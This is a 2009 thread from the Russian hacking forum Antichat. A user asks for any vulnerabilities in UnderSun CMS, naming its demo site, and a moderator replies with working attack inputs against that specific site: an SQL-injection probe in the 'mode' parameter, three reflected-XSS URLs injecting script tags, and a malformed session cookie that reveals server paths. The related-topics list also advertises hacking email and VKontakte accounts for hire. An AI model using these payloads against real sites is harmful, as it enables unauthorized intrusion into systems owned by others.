ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости Кто что знает про эту CMS ?

   

Опции темы

Поиск в этой теме

Опции просмотра

Кто что знает про эту CMS ?   #1   01.07.2009, 22:12 moinick Новичок Регистрация: 01.07.2009 Сообщений: 1 С нами: 8875400 Репутация: 0 Кто что знает про эту CMS ? Нужны любые баги, уязвимости.. demo.undersky.ru demo.undersky.ru/admin/ http://demo.undersky.ru/rss.php?mode=1'&doc=5 Кто еще что подкинет? Это просто пример, на этом движке UnderSun CMS называется.. 𝕏 Twitter Reddit Telegram Копировать ссылку Последний раз редактировалось moinick; 01.07.2009 в 22:20..   moinick Посмотреть профиль Репутация Отправить личное сообщение для moinick Найти все сообщения от moinick Добавить в друзья   #2   07.07.2009, 23:36 Ctacok Moderator - Level 7 Регистрация: 19.12.2008 Сообщений: 1,203 С нами: 9154406 Репутация: 2221 Цитата: Сообщение от moinick   Нужны любые баги, уязвимости.. demo.undersky.ru demo.undersky.ru/admin/ http://demo.undersky.ru/rss.php?mode=1'&doc=5 Кто еще что подкинет? Это просто пример, на этом движке UnderSun CMS называется.. И так в GET запросе Mode Ты поставил ', SQL иньекция это не ошибка, это выполнение произвольных команд. Запомни. Цитата: http://demo.undersky.ru/sites.html?p=2%22%3E%3Cscript%3Ealert();%3C/script%3E Цитата: http://demo.undersky.ru/forget_passw.html?answ=14%22%3E%3Cscript%3Ealert() ;%3C/script%3E Цитата: http://demo.undersky.ru/news.html?id=3%22%3E%3Cscript%3Ealert();%3C/script%3E Кароч там всё с XSS Раскрытие путей В куках Цитата: PHPSESSID=@#$%^&* Итог Цитата: Warning: session_start() [function.session-start]: The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in /usr/home/undersun/domains/demo.undersky.ru/public_html/index.php on line 7 Кароч сайтег дырявенький   Ctacok Посмотреть профиль Репутация Отправить личное сообщение для Ctacok Посетить домашнюю страницу Ctacok Найти все сообщения от Ctacok Добавить в друзья

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Юмор. Анекдоты, смешные рассказы/логи.	Mobile	Болталка	1356	16.06.2010 16:46
Взлом E-Mail и анкет Vkontakte.ru на заказ	Frost26	Freelance - О Работе	25	19.11.2009 22:00

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход Мой кабинет Личные сообщения Подписки Кто на форуме Поиск по форуму Главная страница форума ИНФО     Мировые новости. Обсуждения.     Статьи         Избранное РАЗРАБОТКА     Ваши проекты     SЕО - тонкости, методы раскрутки         Услуги, Покупка и Продажа в SEO     Хостинги - Hostings         Хостинг, Dedicated, VDS, Сервера - покупка, продажа     Для Администратора         Apple: Mac, OS X, iOS         AntiDDos - АнтиДДОС         Windows         Linux, Freebsd, *nix ПРОГРАММИРОВАНИЕ     Общие вопросы программирования         ПО для Web разработчика     PHP     Python     С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby     Реверсинг ФИНАНСОВЫЕ ЗАДАЧИ/СОЦИАЛЬНЫЕ СЕТИ     Покупка, Продажа, Обмен         Разное - Покупка, продажа, обмен         Услуги, Покупка и Продажа в SEO         Электронные валюты: Обмен, Вывод, Ввод         VPN, Proxy, Socks - Покупка, продажа         Хостинг, Dedicated, VDS, Сервера - Покупка, продажа         Мобильная связь, СМС - Покупка, продажа         Трафик, инсталлы, загрузки - Покупка, продажа         Покупка, продажа, услуги в Соц. Сетях     Партнерки     Freelance - О Работе         Предложения работы, услуг     Социальные сети         Покупка, продажа, услуги в Соц. Сетях     Платежные системы         Электронные валюты: Обмен, Вывод, Ввод         Blockchain, Криптовалюты, смарт-контракты ЛИЧНЫЕ ФОРУМЫ     Olbanec - Арбитраж трафика ОФФТОП     Болталка     Forum for discussion of ANTICHAT     Video.Antichat         Комментарии к видео     Архив         ICQ - Покупка, продажа